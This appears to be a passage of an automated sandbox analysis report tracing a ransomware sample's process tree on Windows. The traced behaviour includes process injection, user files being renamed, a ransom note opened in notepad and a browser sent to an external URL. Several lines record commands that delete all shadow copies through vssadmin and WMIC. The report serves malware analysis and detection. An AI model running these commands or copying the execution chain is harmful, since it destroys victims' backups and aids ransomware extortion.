58 PID 1920 wrote to memory of 912 1920 cmd.exe 58 PID 1920 wrote to memory of 912 1920 cmd.exe 58 PID 1692 wrote to memory of 1596 1692 cmd.exe 72 PID 1692 wrote to memory of 1596 1692 cmd.exe 72 PID 1692 wrote to memory of 1596 1692 cmd.exe 72 PID 1016 wrote to memory of 1084 1016 cmd.exe 71 PID 1016 wrote to memory of 1084 1016 cmd.exe 71 PID 1016 wrote to memory of 1084 1016 cmd.exe 71 PID 1596 wrote to memory of 1688 1596 conhost.exe 62 PID 1596 wrote to memory of 1688 1596 conhost.exe 62 PID 1596 wrote to memory of 1688 1596 conhost.exe 62 PID 912 wrote to memory of 668 912 CompMgmtLauncher.exe 61 PID 912 wrote to memory of 668 912 CompMgmtLauncher.exe 61 PID 912 wrote to memory of 668 912 CompMgmtLauncher.exe 61 PID 2016 wrote to memory of 1548 2016 CompMgmtLauncher.exe 60 PID 2016 wrote to memory of 1548 2016 CompMgmtLauncher.exe 60 PID 2016 wrote to memory of 1548 2016 CompMgmtLauncher.exe 60 PID 1084 wrote to memory of 1764 1084 conhost.exe 59 PID 1084 wrote to memory of 1764 1084 conhost.exe 59 PID 1084 wrote to memory of 1764 1084 conhost.exe 59 PID 1064 wrote to memory of 1704 1064 iexplore.exe 76 PID 1064 wrote to memory of 1704 1064 iexplore.exe 76 PID 1064 wrote to memory of 1704 1064 iexplore.exe 76 PID 1064 wrote to memory of 1704 1064 iexplore.exe 76 PID 1256 wrote to memory of 2280 1256 Explorer.EXE 80 PID 1256 wrote to memory of 2280 1256 Explorer.EXE 80 PID 1256 wrote to memory of 2280 1256 Explorer.EXE 80
Processes
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:288
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Users\Admin\AppData\Local\Temp\7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe"C:\Users\Admin\AppData\Local\Temp\7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1788 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:296 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵PID:2280
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1320
-
-
C:\Windows\system32\cmd.execmd /c "start http://4c48acb82e784a70aecsnwyqmwa.jobsbig.cam/csnwyqmwa^&1^&46283070^&88^&399^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://4c48acb82e784a70aecsnwyqmwa.jobsbig.cam/csnwyqmwa&1&46283070&88&399&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1064 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1704
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:952
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1548
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:668
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:1596
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1688
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:1084
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1764
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:720
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1788
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1644
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1525249610-309335695-16022926011397113584159485717820089419132011234923-998227471"1⤵
- Suspicious use of WriteProcessMemory
PID:1084
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "75213905212396859241736988255-4711596821574049572-1916106291-170072928-1789860560"1⤵
- Suspicious use of WriteProcessMemory
PID:1596
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1368
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:944
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4481⤵PID:2372